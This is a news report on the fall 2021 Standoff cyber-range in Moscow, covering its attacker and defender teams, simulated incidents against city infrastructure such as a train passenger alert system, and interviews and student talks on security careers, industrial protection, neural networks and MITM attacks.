Just like in real life: a train passenger alert system gets hacked seven times at the Moscow cyber-range

That's how The Standoff, the largest competition between hackers and IT security specialists, began

Would you take a self-driving car for a cruise downtown? Lots of people confidently answer "yes." But a self-driving car is basically a computer—and the street light hanging peacefully over the road is a computer too. If it gets hacked—the traffic light, not even the car—it could cause an accident. Modern life in a city is kind of like a self-driving car—it’s almost completely digitized. And it makes us all very vulnerable.

To understand which kinds of digital incidents can occur in a country, the largest open cyberbattle (it's in the Russian Book of Records) was created a few years ago. It’s called the Standoff, and it’s being held right now (November 14–16) in Moscow. Other activities are also in full swing: The Young Hats track for young scientists, The Standoff Digital Art hacking contest, and round tables with leading experts on information security from the largest companies.

The Standoff is a cyber-range that models the production and business processes of real companies and industries. This helps businesses to spot flaws in their infrastructure, and to understand exactly how hackers can get inside. At the cyber-range, infosec employees can hone their skills and expertise in thwarting cyberattacks that could have unacceptable consequences for the company. It wasn't long ago that teams of attackers and defenders fought for control of the city. By the fall of 2021, it has turned into a city-state with such industries as metallurgy, transport, logistics, oil and gas, energy, and municipal services. All its technology is controlled by real systems and controllers used by real infrastructure objects. The event is attended by 10 attacker teams and five defender teams.

Who's attacking the city, and who's defending it

"Ten is the ideal number of attacking teams," said Yaroslav Babin, an event organizer on the red teams' side and the Head of Positive Technologies' Department of Web Application Security Analysis. If there are more than ten teams on the floor at once, they start getting in each other's way. Participants in the Standoff include the top ten attacker teams from the May cyberbattle:

  • True0xA3 came in first in 2019 and second in 2020. They were back on the winners' podium last spring. They intend to win three Standoffs in a row.
  • Codeby&NitroTeam is an international team featuring experts from codeby.net and Nitro Team, the Kazakhstan red team.
  • Invuls is a team of professionals in various IT security fields. The team members took part in Black Hat, ZeroNights, The Standoff and other CTF competitions. Two-time IoT CTF competition winners at DEFCON USA.
  • Team SPbCTF was formed at meetups of SPbCTF competitive hacking community spbctf.com and took part in The Standoff for the first time in 2019. They're probably the only team that includes secondary school students.
  • Bulba Hackers are students from Belarus. Their primary goal is to develop an information security community in Belarus: bulbahackers.by. Having started out by winning a national-level CTF event, the team is keen to expand the information security community in Belarus.
  • EvilBunnyWrote gained access to confidential information about passengers at City F’s virtual airport in spring 2020.
  • TSARKA is a top team of hackers from Kazakhstan. Three-time finalists of The Standoff, took first place in 2017.
  • Antibuddies is a group of IT security enthusiasts from all over the world. Part of the team won The Standoff 2019 and The Standoff Abu Dhabi. The lineup also features experts from Bi.Zone, Huawei, Informzaschita, and Network Optix.
  • SCS are veterans of The Standoff 2018 and 2019.
  • Unlim is a young and ambitious team from Tyumen. Discovered critical vulnerabilities during pentesting of regional organizations: banks, media, and a government data center. Took bronze in the CTF Russian Cup and silver in the Innopolis CTF Challenge.

"Attackers come to The Standoff for new experience," notes Yaroslav Babin. "Here they can really boost their skills. Besides, winning The Standoff is a highly prestigious, CV-worthy achievement; experts are genuinely proud of it. Ethical hackers also have a financial motive—the winners receive money prizes."

The defenders’ primary objective is to identify incidents in the infrastructure and investigate them quickly. According to Dmitry Ushakov, the manager of the cyber-range’s architecture, the Standoff’s defenders include five teams:

Kosmos (defending City Housing and Utilities and the State IT Platform), G.A.R.M. (defending Tube and the State IT Platform), }{01m$ Investigation (defendingOilChem, MetalliKO, and the State IT Platform), GiSCyberTeam (defending Heavy Logistics, the electric power industry and the State IT Platform), Your shell not pass (defending Heavy Logistics and the State IT Platform).

"At The Standoff, defenders can verify the feasibility of unacceptable events," says Mikhail Pomzov, Director of Information Security Knowledge Base and Expertise, Positive Technologies. "They can test their own approaches to cybersecurity and train their team in order to find out how quickly and effectively they can respond to attacks, helping them to upgrade their security skills in real life."

Both speakers also shared a few secrets about the upcoming online cyber-range (to which major resources are currently being dedicated) and told us which infrastructure objects will be first in line (spoiler: the banking and energy industries).

"Going online will allow us to significantly expand the cyber-range’s audience," said Yaroslav Babin. "Right now we can afford ten red teams, or 120 members. The online cyber-range will give us unlimited options in the regard. By spring, we’re planning to increase this number to 200–300. Ideally, we could have as many as 500 participants. This, of course, will require infrastructure transformation, which we're planning to do, but the figure seems quite realistic to me. Testing of the online cyber-range is scheduled for the end of November, where 50 ethical hackers who have already participated in The Standoff will be invited."

Battles in City F

All events in the city-state infrastructure are traditionally monitored by The Standoff's global SOC, which was deployed this year by the partner of the cyberbattle―Innostage Group. In terms of the infrastructure, the SOC is based on the key products of Positive Technologies and Innostage's in-house developments. Its main task is the general monitoring of the activity of both the attacker and defender teams.

"By midday on September 14th, a few teams of "reds" (hackers) had managed to disable the train passenger alert system," said Vladimir Dmitriev, Head of the Cybersecurity Service Department at CyberART (Innostage). "They attacked the systems that display information on screens at a City F train station, causing it to display misinformation instead." Transport company Heavy Logistics was hit by several red teams at once (True0xA3, Codeby&Nitro Team, Invuls, SPbCTF, Bulba Hackers, Antibuddies, SCS, and Unlim), and the train passenger alert system was disabled seven times. On November 15, it took the Your shell not pass blue team about 10 hours to investigate the incident.

The primary sources of data on incidents were NTA (deep analysis of network traffic) and WAF (a security screen for web applications) solutions. The most frequent events were gaining initial access (58%) and lateral movement (14%).

Alexei Goncharov, Assistant Director of Positive Technologies' Expert Security Center for Monitoring and Response Services, noted the high degree of engagement among the reds, but he also observed that many of their attacks were still ineffective. Both speakers also advised the defenders to "watch oil" and keep an eye on the government IT systems of the cyber-range.

During the first few hours, it became evident that the defenders were using various strategies: some of them focused on efficient interactions within the team, others were studying the behavior of security tools and their optimal configuration, and still other teams were battling for the fastest investigation.

G.A.R.M. has submitted more reposts on attacks than any other team. The attacks reported by the defenders by the end of the first day of the cyberbattle were no longer related to penetration—they mainly had to do with data collection, persistence, and lateral movement. Moreover, the defenders are reporting suspicious activity at Tube, an oil and gas company which, according to the city-state's legend, is engaged in the extraction, transportation, and storage of Earth's riches. As suggested by their reports, the attackers have gained local administrator privileges on one of the hosts. The red teams have also managed to obtain access to the resources of the OilChem refinery. The next unacceptable event may occur in one of these companies.

Towards the evening of November 15th, the jury received 13 more vulnerability reports—69% of these vulnerabilities involved remote code execution. That was much less than the previous day. Apparently, the attackers are now focused on key infrastructure facilities, stopping at nothing to disrupt F's critically important companies.

Dmitry Gadar, Tinkoff Bank: "I know that I know nothing"

In a series of The Standoff live broadcasts, Dmitry Sklyarov, Head of Apps Analysis at Positive Technologies, sat down with top information security specialists from three large companies to chat about how they started working in cybersecurity, what they think can be done to improve information security, and what skills security professionals need to master.

Karim Valiev, Head of the Information Security Department, Mail.ru Group: "We need to allow users to choose between competing companies. Appropriate regulation, healthy initiatives, and the promotion of intelligent standards by the state can motivate companies to compete for users’ trust.”

Dmitry Gadar, Vice-President, Head of Information Security Department, Tinkoff Bank: "A security professional must develop critical thinking and constantly learn new things. You have to repeat yourself "I know that I know nothing" and dig deeper, constantly improving your research skills.

Denis Gorchakov, Head of Information Security Department at Rostelecom: "Expertise gathered by the major players of the information security market must be combined in a shared knowledge base so that smaller players could also use it."

Alexey Zakharov, the founder of Superjob, also touched upon the topic of work in cybersecurity. He compared the increase in programmers’ salaries to the share prices of a leading maker of electric vehicles and predicted that the developer shortage will intensify. "We have a high-quality system for training coders, but there aren't enough young people to feed it. There are fewer and fewer qualified specialists… Salaries [next year in cybersecurity] will increase by at least 30%. Employers need to get ready. For the past two years, the cybersecurity salary index on Superjob seems to have been tracking Tesla's share price: salary offers for qualified cybersecurity professionals have grown at about the same rate."

About an axe, a bucket and a 90-percent increase in attacks on industrial sector

The issue of the shared knowledge base also applies to industrial cybersecurity. Vladimir Zapolyansky, Director for Marketing and Corporate Communications, Positive Technologies, discussed trends in the protection of critical information infrastructure with Anton Kokin, Head of the IT Infrastructure Protection, TMK. Vladimir noted that, according to Positive Technologies, in 2020 the number of cyberattacks on the industrial sector increased by 90% compared to 2019.

"Over the past 4–5 years, the security of industrial companies has greatly increased, and many have begun to pay more attention to it. But we can never be 100% certain," says Anton Kokin. "There is always the possibility of different outcomes, as evidenced by the Colonial Pipeline incident. But that is a reason not to be scared, but to initiate changes. One of the problems of the industrial sector is that we have not created an analog of the Bank of Russia's FinCERT. This is a venue for pooling experience, incident data, indicators of compromise—it's very important. As for The Standoff facilities, the attacks on metallurgical production are of great concern, since in real life they can lead to serious downtime. Power-generating companies can also find themselves in hackers' cross-hairs. Cyberexercises are vital, so we host our own. Defenders are like soldiers—they need training. As in the case of a fire, people need to know where the axe and bucket are."

Young people are studying neural networks, OSINT, and MITM attacks

Future information security experts—students and junior cybersecurity professionals—spoke as part of The Young Hats track. This was a competition held by Positive Technologies and the Innostage Group, the co-organizer of the cyberbattle, for up-and-coming infosec professionals. The operating principles of security products, vulnerabilities of neural networks, MITM attacks in the modern threat landscape, and new forensic methods are just a few of the topics that talented young specialists are researching. The young experts that made it to the finals were invited to present their ideas and projects at The Standoff Moscow.

In his talk, "101 for a neural network specialist," Mikhail Sukhov discussed the security of neural networks, a technology that is now used in a wide range of fields—from the banking sector to contemporary art. He explained what information security specialists need to know about them and the dangers they present for a business infrastructure.

Kseniya Zmicherovskaya also focused on neural networks and machine learning. After reviewing the major sore points for SOC experts that attackers can exploit, she argued that a more comprehensive approach to detecting previously unknown and complex cyberthreats is needed: as information security incidents—including false positives—are mushrooming, SOC analysts can easily miss them. Machine learning and process mining make it possible to identify user behavior scenarios and attack chains, combining them into a single timeline to facilitate not only detection, but incident investigation too.

Ilya Shaposhnikov, captain of the Invuls CTF team, discussed the Pentest Collaboration Framework, a tool his team developed. "The five main issues that come up when you're conducting a penetration test are: working with the initial data, storing information about the network and previous projects, generating reports, and quickly sending information to the customer, such as about the detection of a critical vulnerability. Our cross-platform, open-source, and—most important—free PCF tool can resolve most of those issues," Ilya said.

Darya Sukhova, a student at the National Research Nuclear University MEPhI, discussed a well-known and widely used method of attacking an organization's infrastructure. Attackers still successfully use MITM (man-in-the-middle) attacks to advance inside a local network. Darya said that to this day, many websites still operate through the HTTP protocol and are unable to automatically redirect to a version with the HTTPS protocol. This enables attacks against users that aim to deploy malicious JavaScript code and substitute downloaded files. This problem is even more acute on local networks because protecting against this type of attack requires highly qualified IT staff and a lot of time.

The rising generation of cybersecurity pros who presented in the technical track touched on subjects including the use of OSINT to detect data leaks and identify sources of threats, training information security specialists from a young age, and configuring a Kubernetes cluster and how it can benefit attackers.

The public portion of The Standoff 2021 fall cyber-range will end on November 16. The winners and top defender teams will be announced in the evening. Stay tuned!